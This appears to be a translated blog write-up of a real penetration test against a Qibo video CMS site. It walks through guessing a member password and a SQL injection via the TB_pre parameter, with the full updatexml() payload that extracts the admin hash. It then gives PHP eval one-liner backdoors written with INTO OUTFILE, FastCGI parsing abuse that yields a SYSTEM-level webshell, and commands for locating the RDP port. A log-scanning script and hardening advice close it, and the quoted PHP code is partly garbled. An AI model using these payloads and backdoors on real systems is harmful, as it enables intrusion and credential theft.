Hacking Book | Free Online Hacking Learning



Posted by verstraete at 2020-02-27


This penetration test comes from a real engagement in which a vulnerability had to be found. Because the target was a large company, finding a vulnerability in the main site was comparatively difficult, while its subsidiaries and subdomain sites were more promising. A port scan showed that the server exposed only a few ports, and automated scanning of the web application turned up nothing exploitable. By combining experience with the vulnerabilities present in the CMS, server privileges were finally obtained.

1.1 information collection

1. Scan port

Zenmap was used to run a full-port scan of 124.***.***.*** (address masked in the original). The scan reported the host as down, which suggests the server sits behind security protection, so the "Intense scan, no ping" profile was used instead, as shown in Figure 1. The server has ports 808049154 open, and from the scan information it is judged that the server runs Windows 2008.

2. Reverse query domain name

At http://www.yougetsignal.com/tools/web-sites-on-web-server/, a reverse lookup of the IP address returns 6 domain names hosted on it, as shown in Figure 2.

1.2 scan website

As shown in Figure 3, although XSS and JavaScript-related issues were found, there is no high-risk vulnerability that could be exploited directly. The scan results still reveal useful information such as the website directory layout and existing script files. When scanning a target, several scanners can be used for cross-checking.

1.3 search for vulnerabilities in CMS system

Since the scanner found no high-risk or exploitable vulnerability, the search continued manually, guided by experience. As shown in Figure 4, the footer of the target website reads "powered by qibosoft v1.0 code © 2003-10 qibosoft", which confirms a Qibo CMS; combined with the site content, it was judged to be the Qibo video CMS. A copy of the Qibo video CMS was downloaded from the Internet for local analysis.

Qibo video CMS 1.0 has a SQL injection vulnerability. The precondition is to register a user and add a topic; the injected SQL query can then be executed to obtain the administrator password.

1. Background address



2. There is a cross site vulnerability

3. SQL injection vulnerability exists

In the code file video/member/special.php, $TB_pre is never initialized. Because Qibo emulates register_globals (pseudo global variable registration), a request parameter of the same name is inserted straight into the SQL query, which causes SQL injection. The code is as follows:

    // Fragment of video/member/special.php as quoted in the original post. The
    // quote starts and ends mid-function and the extraction was garbled, so only
    // the recoverable statements are shown; cuts are marked.
            $list * 1000000 + $aid;
            $array[$list] = $aid;
        }
        /* [cut] */ > 100) {
            showerr("record has reached the upper limit!", 1);
        }
        if (!in_array($aid, /* [cut] */ $act == "del" && $aid) {
            $detail = explode(",", $rsdb[tids]);
            foreach ($detail as $key => $value) {
                if ($value == $aid) {
                    unset($detail[$key]);
                }
            }
            $rsdb[tids] = $string = implode(",", $detail);
            $db->query("update {$_pre}special set tids='$string' where uid='$lfjuid' and id='$id'");
        }
        // $type=='all' initializes the list of posts in the topic
        {
            // $TB_pre is never assigned in this file: with Qibo's emulated
            // register_globals a request parameter named TB_pre ends up here
            $query = $db->query("select * from {$TB_pre}threads where tid in ($string)");
            while ($rs = $db->fetch_array($query)) {
                $rs[subject] = "<a href='$webdb[passport_url]/read.php?tid=$rs[tid]' target=_blank>$rs[subject]</a>";
                $_listdb[$rs[tid]] = $rs;
            }
        }
        $aidsdb = explode(",", $rsdb[tids]);
        $NUM = 0;
        foreach ($aidsdb AS $key => $value) {
            $NUM++;
            if ($_listdb[$value]) {
                $show .= "<tr align='center' class='trA' onmouseover=\"this.className='trB'\" onmouseout=\"this.className='trA'\">"
                       . "<td width='5%'>{$_listdb[$value][tid]}</td>"
                       . "<td width='74%' align='left'>{$_listdb[$value][subject]}</td>"
                       . "<td width='10%'><input type='text' name='listdb[{$value}]' size='5' value='{$NUM}0'></td>"
                       . "<td width='11%'><a href='special.php?job=show_BBSiframe&id=$id&type=listatc&act=del&aid={$_listdb[$value][tid]}' target='spiframe'>remove</a></td></tr>";
            }
        }
        $show = "<table width='100%' border='0' cellspacing='1' cellpadding='3'>"
              . "<tr align='center' bgcolor='#eeeeee'><td width='5%'>ID</td><td width='74%'>Title</td>"
              . "<td width='10%'>sort value</td><td width='11%'>remove</td></tr>$show</table>";
        $show = str_replace("\r", "", $show);
        $show = str_replace("\n", "", $show);
        $show = str_replace('"', '\"', $show);
        echo "<SCRIPT LANGUAGE='JavaScript'><!--parent.document.getElementById('sp_atclist').innerHTML=\"$show\";//--></SCRIPT>";
    }
    if ($type == 'myatc' || $type == 'all') {
        $detail = explode(",", $rsdb[tids]);
        $show = '';
        if ($page < 1) {
            $page = 1;
        }
        $rows = 15;
        /* [cut] */
        // same uninitialized prefix; this is the query reached with type=myatc in section 1.4
        $query = $db->query("select * from {$TB_pre}threads where $SQL order by tid desc limit $min,$rows");


1.4 breakthrough

1. Get registered member information

Visit http://www.*****.com/member/homepage.php?uid=2 and http://www.*****.com/member/homepage.php?uid=1 respectively to obtain the currently registered accounts, admin and aaaaaa, as shown in Figure 5.

2. Guess the password of member account

Guess the password of aaaaaa: it turns out to be aaaaaa, the same as the username. Log in with this password, find a topic in the member area and add a topic. This yields the topic address:


3. Get incomplete administrator password

Construct the SQL injection address to obtain the administrator password; the execution result is shown in Figure 6:

http://www.********.com/member/special.php?job=show_BBSiframe&type=myatc&id=12&TB_pre=qb_module where 1=1 or 1=updatexml(2,concat(0x7e,((select concat(username,0x5c,password) from qb_members limit 0,1))),0) %23

4. Use the right() function to get the remaining password characters

Although the admin password "0e8c338ca961a1da946cc6a28" is obtained the first time, its length is wrong: 25 characters were returned, while the real password is an MD5 hash of 32 characters. (The updatexml() error message that carries the data is truncated to 32 characters, and the "~admin\" prefix already occupies 7 of them.) The remaining part of the password is obtained with right(password,15); as shown in Figure 7, the rest of the string is retrieved successfully.



First access to administrator password: 0e8c338ca961a1da946cc6a28

Second access to administrator password: 46cc6a2802fc1ee

The two results overlap; combining them on the duplicated fragment gives the complete password: 0e8c338ca961a1da946cc6a2802fc1ee

5. Get administrator password

Cracking 0e8c338ca961adad946cc6a2802fc1ee through cmd5.com gives the password "xdjzh" of the administrator admin. Log in to the back end with this password and view the server information. Opening http://www.******.com/admin/index.php?lfj=center&job=phpinfo in the browser, as shown in Figure 8, reveals the real path of the website: D:/phpweb/video

1.5 get webshell

1. Execute SQL query to export one sentence backdoor

Click System functions > Database tools > Run SQL statement and execute the following code in the query box:

select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/video/stttt.php'

After execution, visiting the file returns a file-not-found error from the website. Other paths were tried next:

select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/video/upload_files/s.php'

select '<?php @eval($_POST[t]);?>' INTO OUTFILE 'D:/phpweb/upload_files/icons/s.php'

The statements execute successfully, as shown in Figure 9, but accessing the corresponding addresses gives an error and no webshell is obtained. Presumably anti-virus software removes the file or the directory is not writable.

2. View service information

Checking the server information shows that FastCGI is enabled and the web server is IIS 7, so a parsing vulnerability may exist. A picture file carrying the one-sentence backdoor is therefore uploaded through the admin profile, and the following address is visited:


The page renders normally, and a webshell is obtained by connecting China Chopper (Chinese kitchen knife) to the one-sentence backdoor, as shown in Figure 10.

Background knowledge:

1. FastCGI parsing vulnerability: when the web server's FastCGI handling is misconfigured, other files (static files such as CSS, JS and JPG) can be handed to PHP and executed as scripts. If a user disguises a malicious webshell script as a static file, uploads it to the web server, and the server passes it to the PHP back end for parsing, the attacker gains the ability to run commands on the server.

2. Testing for the vulnerability

Create a JPG file test.jpg containing phpinfo() in the server's web root and visit http://www.xxx.com/test.jpg/1.php (the PHP file name appended after test.jpg is arbitrary). If the vulnerability exists, the phpinfo() output is displayed; otherwise a 404 error is returned.
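As an added defensive example (not part of the original post), the following Python script flags, in constructed IIS W3C log lines, the two request shapes used in sections 1.4 and 1.5: a TB_pre parameter or updatexml() call in the query string of the injection, and a static file followed by /anything.php for the FastCGI parsing abuse. The log field layout and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request shapes from this write-up: the TB_pre injection against member/special.php
# (error-based, via updatexml) and "/<anything>.php" appended to a static file.
SQLI_PARAM = "tb_pre"
SQLI_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
PATHINFO_ABUSE = re.compile(r"\.(jpe?g|gif|png|css|js|txt)/[^/?]*\.php$", re.I)

# Constructed sample log lines in IIS W3C format (not from the engagement).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2020-02-27 10:01:02 10.0.0.5 GET /member/homepage.php uid=2 80 203.0.113.9 200
2020-02-27 10:02:41 10.0.0.5 GET /member/special.php job=show_BBSiframe&type=myatc&id=12&TB_pre=qb_module%20where%201=1%20or%201=updatexml(2,concat(0x7e,(select%20password%20from%20qb_members%20limit%200,1)),0)%20%23 80 203.0.113.9 500
2020-02-27 10:07:13 10.0.0.5 GET /upload_files/icons/avatar.jpg - 80 203.0.113.9 200
2020-02-27 10:07:20 10.0.0.5 GET /upload_files/icons/avatar.jpg/x.php - 80 203.0.113.9 200""".splitlines()


def classify_request(url: str) -> list:
    """Return finding labels for one request URL (empty list = nothing suspicious)."""
    findings = []
    parts = urlsplit(url)
    params = {k.lower() for k in parse_qs(parts.query, keep_blank_values=True)}
    decoded_query = unquote(parts.query).replace("+", " ")
    # The table prefix is a server-side constant; a client never has a
    # legitimate reason to send it, so its mere presence is a finding.
    if SQLI_PARAM in params:
        findings.append("tb_pre-override")
    if SQLI_FUNCS.search(decoded_query):
        findings.append("error-based-sqli")
    if PATHINFO_ABUSE.search(unquote(parts.path)):
        findings.append("fastcgi-pathinfo")
    return findings


def scan_log(lines):
    """Return a list of (uri-stem, labels) for each suspicious W3C log line."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:
            continue
        stem, query = fields[4], fields[5]
        url = stem if query == "-" else f"{stem}?{query}"
        labels = classify_request(url)
        if labels:
            hits.append((stem, labels))
    return hits
```

Running scan_log(SAMPLE_LOG) reports the special.php request with both injection labels and the avatar.jpg/x.php request as a parsing-abuse attempt, while the two legitimate requests are silent.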

1.6 access to system authority

1. Get the RDP (port 3389) information

(1) Get the process ID of TermService:

    tasklist /svc | findstr TermService

Result: svchost.exe 2212 TermService

(2) Obtain the port corresponding to PID 2212:

   netstat -ano | findstr 2212

The result shows that the service listens on port 13389 rather than the default 3389.

2. Get database password

Read the database configuration file D:/phpweb/video/data/mysql_config.php through the webshell to obtain the MySQL password 123456, together with the database credentials of an intranet server:

    $dbHost        =        "";
    $dbUser        =        "dataUser111";
    $dbPsw        =        "ZLBVA9C********";
    $dbName        =        "*****";

3. The current privilege is SYSTEM

Open a command terminal through the webshell; as shown in Figure 12, it already runs with SYSTEM privileges, so an administrator account could be added directly.

As this was a real engagement, no further testing was done after server privileges were obtained. Following the same approach, the penetration could be continued step by step.

1.7 security hardening measures

1. Delete the test account aaaaaa

2. Change the administrator password

3. Disable website member registration

4. Set strict permissions on the website directories

5. Configure FastCGI

Turn off cgi.fix_pathinfo (set it to 0 in php.ini), or configure the web server to reject suspicious PHP script paths, for example with this rule inside the PHP location block of nginx:

    if ( $fastcgi_script_name ~ \..*\/.*php ) {
        return 403;
    }